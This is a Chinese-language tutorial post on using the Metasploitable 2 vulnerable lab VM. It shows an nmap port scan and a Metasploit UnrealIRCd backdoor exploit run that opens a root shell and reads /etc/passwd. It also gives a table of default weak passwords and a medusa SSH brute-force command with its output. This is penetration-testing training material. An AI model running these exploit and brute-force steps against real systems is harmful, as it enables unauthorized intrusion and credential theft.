Metasploitable 2 漏洞演练系统使用指南(上)

今天要给大家介绍的是Metasploitable漏洞演练系统,他的作用是用来作为MSF攻击用的靶机,他是一个具有无数未打补丁漏洞与开放了无数高危端口的渗透演练系统,在这里,猥琐的黑阔们可以尽情地想出各种淫荡的思路对这个渗透演练系统进行攻击,当一个猥琐的思路不行时你马上可以换一个新的猥琐思路,这也是”回溯(backtarck)”的精髓吧!

废话不多说,马上进入正题( ̄▽ ̄):

 

系统简介:

Metasploitable是一个虚拟机文件,从网上下载解压之后就可以直接使用,无需安装。Metasploitable基于Ubuntu Linux,由于基于Ubuntu,用起来十分得心应手。Metasploitbale建立的初衷,其实就是为了测试一下本家的MSF漏洞框架集工具,所以,它的内核是2.6.24,而且一般在Liunx会产生问题的服务、工具或者软件它都集齐了(请看下文…)。版本2添加了更多的漏洞,而且更让人兴奋的是,系统搭载了DVWA、Mutillidae等Web漏洞演练平台。什么?不懂这是什么?请自行到我国优秀网络安全资讯站Freebuf的文章《十大渗透测试演练系统》脑补<( ̄) ̄)>……

 

如何开始

虚拟机设置完毕后, 就可以登录Metasploitable啦,用户名是 :msfadmin 密码是: msfadmin. 在shell中执行ifconfig命令来查看你的IP 地址.

msfadmin@metasploitable:~$ ifconfig

 

eth0      Link encap:Ethernet  HWaddr 00:0c:29:9a:52:c1

inet addr:192.168.99.131  Bcast:192.168.99.255  Mask:255.255.255.0

inet6 addr: fe80::20c:29ff:fe9a:52c1/64 Scope:Link

UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1

 

 

开启的服务

 

开启网络之后,我们就可以在我们的攻击主机(类似BackTrack或是Kali)开始我们的渗透之旅了, 渗透的第一步当然是识别出那些端口和服务是开放着啦。在我们用神器Nmap扫描过后,我们可以发现Metasploitable开放着一些众多端口:

 

root@ubuntu:~# nmap -p0-65535 192.168.99.131

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2013-05-29 21:14 PDT

Nmap scan report for 192.168.99.131

Host is up (0.00028s latency).

Not shown: 65506 closed ports

PORT      STATE SERVICE

21/tcp    open  ftp

22/tcp    open  ssh

23/tcp    open  telnet

25/tcp    open  smtp

53/tcp    open  domain

80/tcp    open  http

111/tcp   open  rpcbind

139/tcp   open  netbios-ssn

445/tcp   open  microsoft-ds

512/tcp   open  exec

513/tcp   open  login

514/tcp   open  shell

1099/tcp  open  rmiregistry

1524/tcp  open  ingreslock

2049/tcp  open  nfs

2121/tcp  open  ccproxy-ftp

3306/tcp  open  mysql

3632/tcp  open  distccd

5432/tcp  open  postgresql

5900/tcp  open  vnc

6000/tcp  open  X11

6667/tcp  open  irc

6697/tcp  open  unknown

8009/tcp  open  ajp13

8180/tcp  open  unknown

8787/tcp  open  unknown

39292/tcp open  unknown

43729/tcp open  unknown

44813/tcp open  unknown

55852/tcp open  unknown

MAC Address: 00:0C:29:9A:52:C1 (VMware)

 

 

呵呵,如果在真实情况下看到目标机开这么多端口,是不是做梦都会笑醒捏~( ̄▽ ̄)~*

 

 

实例演示:

举个栗子,在6667端口, Metasploitable运行着 UnreaIRCD IRC 后台守护程序,这个版本存在一个自动向其他正在监听状态中的端口发送一个紧跟“AB”信件的系统命令的漏洞(国外文章翻译,我也不知它在讲个什么杰宝~~~<( ̄) ̄)>)

./msfconsole

msf > use exploit/unix/irc/unreal_ircd_3281_backdoor

msf  exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.99.131

msf  exploit(unreal_ircd_3281_backdoor) > exploit

[*] Started reverse double handler

[*] Connected to 192.168.99.131:6667…

    :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname…

    :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn’t resolve your hostname; using your IP address instead

[*] Sending backdoor command…

[*] Accepted the first client connection…

[*] Accepted the second client connection…

[*] Command: echo 8bMUYsfmGvOLHBxe;

[*] Writing to socket A

[*] Writing to socket B

[*] Reading from sockets…

[*] Reading from socket B

[*] B: “8bMUYsfmGvOLHBxe\r\n”

[*] Matching…

[*] A is input…

[*] Command shell session 1 opened (192.168.99.128:4444 -> 192.168.99.131:60257) at 2012-05-31 21:53:59 -0700

id

uid=0(root) gid=0(root)

cat /etc/passwd | grep root

root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9ELid.:14747:0:99999:7:::

小手一抖,权限我有!

暴力破解弱口令:

为了增加可玩性, Metasploit2 的密码强度设置十分糟糕,从系统账号到数据库账号 除了一个密码和账户名相同(msfadmin)的账号 ,它的系统还存在下表所示的弱密码,真是弱爆了啊. 而且ssh也无加密呀,利用medusa工具暴力破解ssh,即可快速暴力破解。

Account Name

Password

msfadmin

msfadmin

user

user

postgres

postgres

sys

batman

klog

123456789

service

service

 

 

root@bt :/medusa –h 192.168.235.12 –U /home/test/user.txt –P /home/test/word.txt –M ssh

很轻松就跑出了下面的密码

ACCOUNT FOUND : [ssh] host:192.168.235.12 User:user Password:user [SUCCEED]

ACCOUNT FOUND : [ssh] host:192.168.235.12 User:msfadmin Password:msfadmin [SUCCEED]

ACCOUNT FOUND : [ssh] host:192.168.235.12 User:klog Password:123456789 [SUCCEED]

 

Metasploitable官方专栏:http://www.offensive-security.com/metasploit-unleashed/Metasploitable

Metasploitable下载地址:http://sourceforge.net/projects/metasploitable/files/Metasploitable2

 

本来还有一个ssh远程溢出提权的,但是昨晚弄到吐血也没搞出来,不解不解~~~

好!今天的内容就到这里,下次还会继续介绍Metasploitable的几个实战栗子,请大家继续关注不要错过yoooooooooooooo~~~~~~~~~~~

 

本文由网络安全攻防研究室(www.91ri.org原创,转载请注明出处。